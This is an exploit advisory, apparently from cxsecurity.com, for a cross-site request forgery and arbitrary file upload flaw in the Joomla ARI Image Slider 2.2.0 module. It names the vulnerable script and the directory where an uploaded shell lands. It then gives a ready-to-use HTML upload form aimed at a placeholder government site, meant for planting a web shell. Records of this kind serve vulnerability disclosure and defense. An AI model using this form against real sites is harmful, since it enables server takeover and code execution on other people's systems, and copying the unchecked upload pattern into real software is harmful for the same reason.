Joomla ARI Image Slider 2.2.0 CSRF Backdoor Access Vulnerability

2019.03.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

################################################################################## # Exploit Title : Joomla ARI Image Slider 2.2.0 CSRF Backdoor Access Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 27/03/2019 # Vendor Homepage : ari-soft.com # Software Download Link : ari-soft.com/Joomla-Components/ARI-Image-Slider/Detailed-product-flyer.html # Software Information Link : extensions.joomla.org/extension/ari-image-slider/ # Software Affected Version : 2.2.0 and lower versions / Compatible with Joomla 2.x and 3.x # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ################################################################################## # Description about Software : *************************** ARI Image Slider module is based on Nivo Slider jQuery plugin and provides possibility to create responsive image slideshow using photos from the selected folders and it is designed for Joomla CMS. ################################################################################## # Impact : *********** Joomla ARI Image Slider 2.2.0 => The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution. Joomla ARI Image Slider 2.2.0 => is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. ################################################################################## # Vulnerable File : **************** /mod_ariimageslidersa.php # Vulnerability : ************** /modules/mod_ariimageslidersa/mod_ariimageslidersa.php # Directory File Path : ******************* /modules/mod_ariimageslidersa/[YOURSHELLNAME].php # CSRF Cross Site Request Forgery Exploiter / Shell Upload : ****************************************************** <form enctype="multipart/form-data" action="https://www.[VULNERABLESITE].gov/modules/mod_ariimageslidersa/mod_ariimageslidersa.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />Select Your File : <input name="userfile" type="file" /><input type="submit" value="Upload" /></form>Cyberizm ################################################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top